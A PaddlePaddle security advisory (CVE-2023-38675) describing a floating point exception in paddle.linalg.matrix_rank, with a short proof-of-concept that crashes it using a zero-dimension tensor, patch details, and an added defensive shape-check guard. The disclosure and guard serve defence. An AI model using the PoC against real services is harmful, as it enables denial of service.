## PDSA-2023-007: FPE in paddle.linalg.matrix_rank

### CVE Number

CVE-2023-38675

### Impact

When the dimensions of `x` make `rows` or `cols` evaluate to 0, `paddle.linalg.matrix_rank` triggers a floating point exception (FPE) in the division `numel / (rows * cols)`. The PoC is as follows:

```python
import paddle
import numpy as np

# 5-D input in which every dimension is 0
x = np.random.uniform(0,0,[0,0,0,0,0]).astype(np.float32)
x = paddle.to_tensor(x)
paddle.linalg.matrix_rank(x)
```

### Patches

We have patched the issue in commit [9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1](https://github.com/PaddlePaddle/Paddle/pull/55644/commits/9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1).

The fix will be included in PaddlePaddle 2.6.0.

### For more information

Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution

This vulnerability has been reported by Tong Liu of ShanghaiTech University.
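
A shape check that mirrors the division described under Impact, usable as a pre-call guard on builds without the fix. This is an added example, not PaddlePaddle's patch or code from the advisory; the function names are hypothetical, and it assumes `rows` and `cols` are the last two dimensions of `x`.

```python
from math import prod
from typing import Sequence


class UnsafeShapeError(ValueError):
    """Raised when a shape cannot be used for numel / (rows * cols)."""


def matrix_batch_count(shape: Sequence[int]) -> int:
    """Return numel // (rows * cols) for a [..., rows, cols] shape.

    Assumption: rows and cols are the last two dimensions of the input.
    """
    dims = [int(d) for d in shape]
    if len(dims) < 2:
        raise UnsafeShapeError(f"need at least 2 dimensions, got shape {dims}")
    if any(d < 0 for d in dims):
        raise UnsafeShapeError(f"negative dimension in shape {dims}")
    rows, cols = dims[-2], dims[-1]
    # Without this check the divisor below is 0, which is the reported FPE.
    if rows == 0 or cols == 0:
        raise UnsafeShapeError(
            f"rows={rows}, cols={cols}: rows * cols is 0 for shape {dims}"
        )
    # A zero-sized batch dimension is harmless: numel is 0, the divisor is not.
    return prod(dims) // (rows * cols)


def is_safe_for_matrix_rank(shape: Sequence[int]) -> bool:
    """True when the shape passes the guard above."""
    try:
        matrix_batch_count(shape)
    except UnsafeShapeError:
        return False
    return True


# Constructed sample shapes; the first is the shape used in the PoC.
SAMPLE_SHAPES = [(0, 0, 0, 0, 0), (4, 0, 3), (2, 3, 0), (0, 3, 3), (2, 3, 4), (5, 5)]

if __name__ == "__main__":
    for shape in SAMPLE_SHAPES:
        print(shape, "ok" if is_safe_for_matrix_rank(shape) else "rejected")
```

On a build without the fix, calling `is_safe_for_matrix_rank(x.shape)` before `paddle.linalg.matrix_rank(x)` rejects the PoC shape while still allowing inputs whose only zero-sized dimensions are batch dimensions.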